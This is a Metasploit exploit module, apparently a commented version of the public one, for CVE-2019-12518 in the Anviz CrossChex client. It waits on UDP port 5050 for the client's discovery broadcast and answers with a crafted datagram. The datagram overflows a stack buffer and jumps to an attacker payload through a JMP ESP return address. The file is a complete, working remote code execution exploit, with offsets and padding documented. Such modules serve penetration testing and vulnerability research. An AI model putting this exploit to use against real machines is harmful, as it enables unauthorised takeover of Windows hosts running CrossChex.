##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
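class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Number of bytes read from the inbound datagram. The content is never
  # inspected by this module -- it only needs to know that something arrived
  # and from which host/port -- so the remainder of the datagram is discarded.
  PACKET_LEN = 10

  include Msf::Exploit::Remote::Udp

  # Registers module metadata, the single x86 target and the listener options.
  #
  # This is a "wait for the client" exploit: it binds a UDP socket on
  # CHOST:CPORT, waits for the CrossChex client's device-discovery broadcast
  # and answers the sender with a malformed reply that overflows a stack
  # buffer in the client (CVE-2019-12518).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Anviz CrossChex Buffer Overflow',
        'Description' => %q{
          Waits for broadcasts from Anviz CrossChex looking for new devices, and returns a custom broadcast,
          triggering a stack buffer overflow.
        },
        'Author' => [
          'Luis Catarino <[email protected]>', # original discovery/exploit
          'Pedro Rodrigues <[email protected]>', # original discovery/exploit
          'agalway-r7', # Module creation
          'adfoster-r7' # Module creation
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2019-12518'],
          ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
          ['EDB', '47734']
        ],
        'Payload' => {
          # Offset (261) + Ret (4) + Shift (4) + Space (8947) = 9216 bytes on the wire.
          'Space' => 8947,
          # The payload is placed as-is; no NOP sled is needed because the
          # Shift padding already lands it exactly where ESP points.
          'DisableNops' => true
        },
        'Arch' => ARCH_X86,
        'EncoderType' => Msf::Encoder::Type::Raw,
        'Privileged' => true,
        'Platform' => 'win',
        'DisclosureDate' => '2019-11-28',
        'Targets' => [
          [
            'Crosschex Standard x86 <= V4.3.12',
            {
              # Bytes of filler written before the saved return address.
              'Offset' => 261,
              # Little-endian 0x00421807: address of a JMP ESP instruction in the
              # CrossChex binary, used to overwrite the saved EIP. The embedded
              # NUL is harmless here because the whole datagram is delivered
              # verbatim over UDP.
              'Ret' => "\x07\x18\x42\x00",
              # Padding between the return address and the payload so the
              # payload starts at the address ESP holds after the JMP ESP.
              'Shift' => 4
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    # The generic RHOST/RPORT options make no sense for a listener; the peer is
    # whoever sends the broadcast.
    deregister_udp_options
    register_options(
      [
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
        Opt::CHOST('0.0.0.0', true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
      ]
    )
  end

  # Waits for a single datagram on the listener socket and fires the overflow
  # buffer back at whoever sent it.
  #
  # Wire layout of the reply (see the target hash):
  #   [Offset bytes filler][Ret][Shift bytes filler][payload.encoded]
  #
  # NOTE(review): the inbound datagram is NOT validated against the CrossChex
  # discovery format -- any host that sends any UDP packet to CHOST:CPORT will
  # receive the exploit buffer in reply. Run this on an isolated segment and
  # check the peer address printed below before trusting a session.
  #
  # @raise [Msf::Exploit::Failed] (via fail_with) when no datagram arrives
  #   within TIMEOUT seconds
  def exploit
    connect_udp

    # A non-positive TIMEOUT becomes nil, which makes Rex's recvfrom wait with
    # no deadline.
    timeout = datastore['TIMEOUT'].to_i
    timeout = nil unless timeout.positive?

    res, host, port = udp_sock.recvfrom(PACKET_LEN, timeout)
    # Rex's recvfrom yields an empty string (with nil host/port) on timeout;
    # to_s also guards against a nil result from an unexpected socket error.
    if res.to_s.empty?
      fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')
    end

    print_status 'CrossChex broadcast received, sending payload in response'
    print_status "Responding to #{host}:#{port}"

    udp_sock.sendto(build_overflow, host, port)
    print_status 'Payload sent'
    # Socket teardown is left to the Udp mixin's cleanup, as in the original.
  end

  private

  # Builds the overflow datagram for the selected target: filler up to the
  # saved EIP, the JMP ESP address, Shift bytes of padding, then the encoded
  # payload. Filler is printable text so it is easy to spot in a crash dump.
  #
  # @return [String] the complete buffer to send to the CrossChex client
  def build_overflow
    buf = rand_text_english(target['Offset'])
    buf << target.ret # saved EIP -> JMP ESP
    buf << rand_text_english(target['Shift']) # align payload with ESP
    buf << payload.encoded
    buf
  end
end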